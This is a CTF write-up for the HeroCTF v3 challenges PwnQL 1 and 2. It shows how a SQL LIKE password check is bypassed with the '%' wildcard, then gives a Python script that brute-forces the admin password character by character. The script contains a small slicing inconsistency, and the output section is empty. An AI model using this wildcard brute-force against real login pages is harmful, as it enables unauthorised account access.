HeroCTF v3 Writeup: PwnQL 1 & 2 (SQL Injection)
3 min readApr 26, 2021
PwnQL 1 and 2 are web challenges with points 50 and 75 respectively,
Website:
Let’s start by reading the source code:
Hmmm… login.php.bak? Let’s try to get the file:
We have to login as admin to get the flag, to login as admin we have to make the query result true,
password LIKE :password;
They have used LIKE to compare input and password but we can easily bypass this by using SQL wildcard characters:
“%” makes the LIKE comparison always true:
PwnQL #2:
The website is the same used in PwnQL 1, here we have to find the password. Most of the work has been done now, all we have to do is to brute-force the flag using “%”, I wrote a python script to automate this process:
import requestsimport stringurl = "http://chall1.heroctf.fr:8080/index.php"headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': '*/*'}possible_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$_'def get_password(username): print("Extracting password of "+username) password = "" while True: for c in possible_chars: payload="username=admin&password="+password+c+"%" pr = requests.post(url ,data=payload, headers=headers) print(payload) if "flag" in pr.text: password += c print(password) break if c == possible_chars[-1]: print("Found password "+password[0:].replace("\\", "")+" for username "+username) return password[1:].replace("\\", "")get_password("admin")
Output:
